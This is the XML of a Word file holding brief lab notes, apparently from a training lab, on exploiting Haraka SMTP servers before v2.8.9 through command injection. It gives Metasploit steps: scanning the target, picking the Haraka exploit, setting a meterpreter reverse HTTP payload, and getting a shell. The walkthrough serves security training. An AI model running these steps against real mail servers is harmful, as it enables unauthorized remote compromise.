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1B7A" w14:textId="64DC51AA" w:rsidR="00853ABF" w:rsidRPr="00436C3D" w:rsidRDefault="00BD2177">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00436C3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting A Vulnerable SMTP Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00436C3D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F0284A" w14:textId="61104D55" w:rsidR="00BD2177" w:rsidRDefault="00145A20">
      <w:r>
        <w:t>For transmission of emails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7919F" w14:textId="77777777" w:rsidR="00145A20" w:rsidRDefault="00145A20"/>
    <w:p w14:paraId="78808CB5" w14:textId="32F48EC5" w:rsidR="00BD2177" w:rsidRDefault="00145A20">
      <w:r>
        <w:t>Simple mail transfer protocol= 25 default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EAD38" w14:textId="6094FF1D" w:rsidR="00145A20" w:rsidRDefault="00436C3D">
      <w:r>
        <w:t xml:space="preserve">Also configured to run on </w:t>
      </w:r>
      <w:r w:rsidR="00145A20">
        <w:t>465 ,587</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F6E6B5" w14:textId="77777777" w:rsidR="00145A20" w:rsidRDefault="00145A20"/>
    <w:p w14:paraId="7E276541" w14:textId="7C72D46F" w:rsidR="00145A20" w:rsidRDefault="00436C3D">
      <w:r>
        <w:t>Haraka is open-source SMTP server developed in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB0C52" w14:textId="77777777" w:rsidR="00436C3D" w:rsidRDefault="00436C3D"/>
    <w:p w14:paraId="4A2FC407" w14:textId="2F7A53F7" w:rsidR="00145A20" w:rsidRDefault="00436C3D">
      <w:r>
        <w:t xml:space="preserve">Haraka versions </w:t>
      </w:r>
      <w:r w:rsidRPr="00616C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>prior to v2.8.9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are vuln to </w:t>
      </w:r>
      <w:r w:rsidRPr="00616C35">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612033BD" w14:textId="77777777" w:rsidR="006D4405" w:rsidRDefault="006D4405"/>
    <w:p w14:paraId="2EDEB562" w14:textId="67168B36" w:rsidR="006D4405" w:rsidRPr="006D4405" w:rsidRDefault="006D4405">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D4405">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B24016" w14:textId="73CEBEA1" w:rsidR="006D4405" w:rsidRDefault="006D4405">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65A8F4B2" w14:textId="5D1C7A88" w:rsidR="006D4405" w:rsidRDefault="006D4405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1129A415" w14:textId="67E431AC" w:rsidR="006D4405" w:rsidRDefault="006D4405">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505DB69D" w14:textId="2FD53C76" w:rsidR="006D4405" w:rsidRDefault="006D4405">
      <w:r>
        <w:t xml:space="preserve">Workspace -a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>haraka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38424ACD" w14:textId="28D94D9B" w:rsidR="006D4405" w:rsidRDefault="006D4405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38872AB5" w14:textId="0789FE3C" w:rsidR="006D4405" w:rsidRDefault="006D4405">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Setg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="40A5B5A4" w14:textId="2BCBC39C" w:rsidR="006D4405" w:rsidRDefault="006D4405">
      <w:r>
        <w:t>Workspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD87430" w14:textId="52997CFB" w:rsidR="006D4405" w:rsidRDefault="006D4405">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_nmap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-O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41DC92CD" w14:textId="77777777" w:rsidR="006D4405" w:rsidRDefault="006D4405"/>
    <w:p w14:paraId="78A53130" w14:textId="6DCE3CB3" w:rsidR="00616C35" w:rsidRDefault="00616C35">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>type:exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name:haraka</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1B3E7877" w14:textId="1FE89001" w:rsidR="00616C35" w:rsidRDefault="00616C35">
      <w:r>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FC2BFE" w14:textId="7638C2F1" w:rsidR="00616C35" w:rsidRDefault="00616C35">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA97DD4" w14:textId="0EB711FD" w:rsidR="00616C35" w:rsidRDefault="00F611D6">
      <w:r>
        <w:t>Set SRVPORT 9898</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63892FF9" w14:textId="29C83F8A" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>email_to</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00D77844">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>root@attackdefense.test</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="550A9A8B" w14:textId="042A2EF7" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r>
        <w:t xml:space="preserve">Set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter_reverse_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19E0AABA" w14:textId="23F5AB24" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AD1EE" w14:textId="6D67BF89" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r>
        <w:t>Set LHOST eth1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E6CC1" w14:textId="13746355" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B0EA54" w14:textId="23D3CCBA" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r>
        <w:t xml:space="preserve"># get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368CF718" w14:textId="5FC25209" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62717B1B" w14:textId="2C794839" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56FFB909" w14:textId="77777777" w:rsidR="00F611D6" w:rsidRDefault="00F611D6"/>
    <w:p w14:paraId="563D45B3" w14:textId="77777777" w:rsidR="006D4405" w:rsidRDefault="006D4405"/>
    <w:p w14:paraId="4CACE5FF" w14:textId="73894F17" w:rsidR="00F611D6" w:rsidRPr="00F611D6" w:rsidRDefault="00F611D6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F611D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A2D13" w14:textId="4DA1D67F" w:rsidR="00F611D6" w:rsidRDefault="00F611D6">
      <w:r w:rsidRPr="00F611D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SRVPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="00F611D6">
        <w:t xml:space="preserve"> is the port the </w:t>
      </w:r>
      <w:r w:rsidRPr="00F611D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>module’s built-in server</w:t>
      </w:r>
      <w:r w:rsidRPr="00F611D6">
        <w:t xml:space="preserve"> listens on to serve</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F61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27"/>
    <w:rsid w:val="00004360"/>
    <w:rsid w:val="00145A20"/>
    <w:rsid w:val="001D4A5A"/>
    <w:rsid w:val="00436C3D"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00616C35"/>
    <w:rsid w:val="006D4405"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00BD2177"/>
    <w:rsid w:val="00F05027"/>
    <w:rsid w:val="00F6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666D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC39CF9D-C3B9-441E-8E9D-0DBA0635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0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ot@attackdefense.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106</Words>
  <Characters>679</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>42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2025-10-08T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-08T16:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>